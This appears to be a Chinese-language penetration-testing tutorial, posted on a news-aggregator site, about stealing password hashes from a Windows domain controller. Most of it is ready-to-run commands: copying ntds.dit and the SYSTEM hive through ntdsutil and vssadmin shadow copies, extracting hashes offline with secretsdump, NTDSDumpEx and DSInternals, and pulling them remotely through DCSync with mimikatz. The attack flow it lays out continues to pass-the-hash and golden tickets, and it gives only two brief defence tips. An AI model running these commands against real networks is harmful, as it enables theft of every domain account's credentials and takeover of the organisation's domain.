当前位置: 首页 > news >正文

域控账号密码抓取

news 2025/5/29 8:08:56

域控账号密码抓取

文章目录

  • 域控账号密码抓取
    • 一、域控账号密码文件NTDS介绍
      • 1.1 NTDS.DIT是什么?
      • 1.2 读取NTDS的三种方式
    • 二、卷影拷贝提取NTDS文件(核心方法)---cs工具使用system权限
      • 2.1 什么是卷影拷贝(VSS)?
      • 2.2 使用ntdsutil工具(分四步)(自带)
      • 2.3 使用vssadmin工具(更简单)(自带)
      • 2.4 其他工具
    • 三、离线读取NTDS中的Hash值
      • 3.1 准备工作
      • 3.2 常用工具
    • 四、在线读取Hash值(直接操作域控)---基于域控同步协议
      • 4.1 常用方法
    • 五、Dcsync攻击原理与利用
      • 5.1 什么是Dcsync?
      • 5.2 攻击流程
      • 5.3 防御建议

一、域控账号密码文件NTDS介绍

1.1 NTDS.DIT是什么?

  • 位置C:\Windows\NTDS\ntds.dit
  • 作用:存储域内所有用户/组的账号密码信息(包括哈希值),类似域控的"数据库"。
  • 保护机制
    • 文件被系统锁定,普通用户无法直接访问。
    • 哈希值通过SYSTEM注册表中的密钥加密。

1.2 读取NTDS的三种方式

  1. 离线读取:将文件复制到本地分析。
  2. 在线读取:直接在域控服务器上运行工具。
  3. 远程读取:通过Dcsync协议远程获取(无需登录域控)。

二、卷影拷贝提取NTDS文件(核心方法)—cs工具使用system权限

2.1 什么是卷影拷贝(VSS)?

  • 微软提供的文件快照技术,可备份被锁定的文件(如ntds.dit)。
  • 常用工具ntdsutilvssadmin、PowerShell脚本等。

2.2 使用ntdsutil工具(分四步)(自带)

# 1. 创建快照
ntdsutil snapshot "activate instance ntds" create quit quit# 2. 挂载快照(需替换快照ID)
ntdsutil snapshot "mount {快照ID}" quit quit# 3. 复制文件(从快照路径复制到本地)
copy C:\$SNAP_时间_VOLUMEC$\Windows\NTDS\ntds.dit C:\目标路径# 4. 删除快照
ntdsutil snapshot "unmount {快照ID}" "delete {快照ID}" quit quit

2.3 使用vssadmin工具(更简单)(自带)

# 1. 创建c盘快照
vssadmin create shadow /for=c:# 2. 复制文件(从卷影副本路径)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\NTDS\ntds.dit C:\目标路径# 3. 删除快照
vssadmin delete shadows /for=c: /quiet

2.4 其他工具

  • IFM模式ntdsutil "ac i ntds" ifm "create full C:/test" quit quit(自动生成ntds.dit和SYSTEM文件) 确保C:/test存在
  • PowerShell脚本Copy-VSS.ps1Invoke-NinjaCopy(绕过文件锁定直接复制)
  • vssown.vbs(PS):脚本化操作,需手动启动 VSS 服务、创建 / 删除快照。

三、离线读取NTDS中的Hash值

3.1 准备工作

  • 获取两个文件:ntds.dit + SYSTEM(含有密钥)(通过reg save hklm\system C:\system.hive导出)

3.2 常用工具

# 1. secretsdump(推荐)
secretsdump.exe -system system.hive -ntds ntds.dit LOCAL# 2. NTDSDumpEx(简单易用)
NTDSDumpEx.exe -d ntds.dit -s system.hive -o hash.txt# 3. DSInternals(PowerShell)
Import-Module DSInternals
$key = Get-Bootkey -SystemHivePath 'system.hive'
Get-ADDBAccount -All -DBPath 'ntds.dit' -Bootkey $key | Out-File hash.txt

四、在线读取Hash值(直接操作域控)—基于域控同步协议

4.1 常用方法

# 1. Mimikatz(需管理员权限)
mimikatz.exe "lsadump::dcsync /domain:abc.com /all /csv"# 2. secretsdump(远程读取)
secretsdump.exe domain/username:password@192.168.1.1# 3. Invoke-DCSync(PowerShell脚本)
Import-Module Invoke-DCSync.ps1
Invoke-DCSync

五、Dcsync攻击原理与利用

5.1 什么是Dcsync?

  • 原理模拟域控之间的数据同步协议(DRS),直接远程请求用户哈希。
  • 权限要求:域管理员、Domain Admins组、Enterprise Admins组成员或域控计算机账户。 域控的Administrator和system也可以

5.2 攻击流程

  1. 获取高权限账户:如通过钓鱼攻击获取域管权限。

  2. 执行Dcsync

    mimikatz.exe "lsadump::dcsync /domain:abc.com /user:administrator"

  3. 导出哈希后利用:进行Pass-the-Hash攻击或制作黄金票据。

5.3 防御建议

  • 定期审计高权限账户。
  • 开启日志监控(事件ID 4662)。
http://www.xdnf.cn/news/670573.html

相关文章:

  • C++数据结构 : 哈希表的实现
  • 2025上半年软考高级系统架构设计师经验分享
  • 第十一节:第一部分:正则表达式:应用案例、爬取信息、搜索替换
  • 牙科低对比度模体,衡量牙科影像设备的性能和诊断能力的工具
  • 8种使用克劳德4的方法,目前可用随时更新!
  • 人工智能与机器学习从理论、技术与实践的多维对比
  • 打造AI智能旅行规划器:基于LLM和Crew AI的Agent实践
  • Flash Attention:让Transformer飞起来的硬件优化技术
  • 宝塔安装easyswoole框架
  • Cherry Studio连接配置MCP服务器
  • wsl图形界面显示
  • 探讨Facebook的元宇宙愿景下的虚拟现实技术
  • 【2025最新】Cline自定义API配置完全指南:接入Claude 3.7/GPT-4o
  • 用C#完成最小二乘法拟合平面方程,再计算点到面的距离
  • OpenGL Chan视频学习-8 How I Deal with Shaders in OpenGL
  • 深入理解设计模式之状态模式
  • kubernetes网络详解(内部网络、Pod IP分配、CNI)
  • 操作系统期中考试
  • 如何彻底禁用WordPress中的评论
  • 三、web安全-信息收集
  • 网络:华为S5720-52X-SI交换机重置console密码
  • 从0开始学习R语言--Day11--主成分分析
  • opencv(C++) 变换图像与形态学操作
  • NFS 挂载配置与优化最佳实践指南
  • openpi π₀ 项目部署运行逻辑(四)——机器人主控程序 main.py — aloha_real
  • 探索C++标准模板库(STL):从容器到底层奥秘-全面解析String类高效技巧(上篇)
  • [Vue] ref及其底层原理
  • UE5 Mat HLSL - Load
  • LeetCodeHot100_0x09
  • 纯C++ 与欧姆龙PLC使用 FINS TCP通讯源码